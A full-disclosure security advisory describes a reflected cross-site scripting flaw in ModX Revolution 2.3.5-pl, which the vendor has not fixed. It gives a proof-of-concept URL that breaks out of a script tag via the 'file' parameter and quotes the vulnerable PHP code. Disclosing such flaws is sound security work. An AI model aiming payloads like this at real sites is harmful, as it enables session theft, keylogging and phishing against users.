ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:   ModX Revolution 2.3.5-pl  
Fixed in:     not fixed
Fixed Version Link:   n/a  
Vendor Contact:   hello@modx.com  
Vulnerability Type:   Reflected XSS  
Remote Exploitable:   Yes  
Reported to vendor:   07/14/2015  
Disclosed to public:   08/17/2015  
Release mode:     Full disclosure
CVE:   n/a  
Credits     Tim Coen of Curesec GmbH  

2. Vulnerability Description

ModX Revolution 2.3.5-pl is vulnerable to reflected cross site
scripting. With this, it is possible to inject and execute arbitrary
JavaScript code. This can for example be used by an attacker to inject a
JavaScript keylogger, bypass CSRF protection, or perform phishing attacks.

The attack can be exploited by getting the victim to click a link or
visit an attacker controlled website.

3. Proof of Concept

The injection takes place into the file GET argument, which is echoed
inside script tags.

http://localhost/modx-2.3.5-pl/manager/?a=system/file/edit&file=xsstest",record:
{"name":"","basename":"","path":"","size":false,"last_accessed":"Jan 01,
1970 01:00:00 AM","last_modified":"Jan 01, 1970 01:00:00
AM","content":false,"image":false,"is_writable":false,"is_readable":false,"source":1},canSave:
0});});alert(1); </script>&wctx=mgr&source=1

4. Code


    manager/controllers/default/system/file/edit.class.php:28
        public function loadCustomCssJs() {

$this->addJavascript($this->modx->getOption('manager_url').'assets/modext/sections/system/file/edit.js');
            $this->addHtml('<script
type="text/javascript">Ext.onReady(function() {
                MODx.load({
                    xtype: "modx-page-file-edit"
                    ,file: "'.$this->filename.'"
                    ,record: '.$this->modx->toJSON($this->fileRecord).'
                    ,canSave: '.($this->canSave ? 1 : 0).'
                });
            });</script>');
        }

5. Solution

This issue was not fixed by the vendor.

5. Report Timeline

07/14/2015   Informed Vendor about Issue (no reply)
08/13/2015   Contacted Vendor again (no reply)
08/17/2015   Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ModX-Revolution-235-pl-Reflected-Cross-Site-Scripting-Vulnerability-43.html